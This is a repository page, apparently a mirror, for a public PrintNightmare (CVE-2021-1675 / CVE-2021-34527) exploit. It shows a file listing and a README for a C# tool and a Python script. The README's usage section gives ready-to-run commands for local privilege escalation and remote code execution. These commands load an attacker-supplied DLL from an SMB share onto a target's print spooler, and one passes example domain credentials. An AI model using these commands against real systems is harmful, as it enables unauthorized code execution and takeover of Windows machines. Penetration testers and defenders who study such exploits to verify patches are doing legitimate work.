r3pek
/
CVE-2021-1675
mirror of https://github.com/cube0x0/CVE-2021-1675.git
1
0
Fork 0
Code Releases Activity
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
23 Commits
1 Branch
0 Tags
1.7 MiB
 
 
Tag: Branch: Tree: 4b2c8cf663
Branches Tags
${ item.name }
Create tag ${ searchTerm }
Create branch ${ searchTerm }
from '4b2c8cf663'
${ noResults }
CVE-2021-1675/SharpPrintNightmare
History
cube0x0 56c1f8668e
New python version with MS-PAR 		3 years ago
..
SharpPrintNightmare New python version with MS-PAR 3 years ago
CVE-2021-1675.py New python version with MS-PAR 3 years ago
README.md New python version with MS-PAR 3 years ago

README.md

C# Implementation of CVE-2021-1675 / CVE-2021-34527

Update

New CVE-2021-1675.py has been uploaded which will get the same result as the C# version

Usage

The RCE functionality might need to be executed with local administrator privileges on YOUR machine.

#LPE
C:\SharpPrintNightmare.exe C:\addCube.dll

#RCE using existing context
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20'

#RCE using runas /netonly
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll'  'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' hackit.local domain_user Pass123

Acknowledgements

For contributing new ideas or exploit improvements, thanks to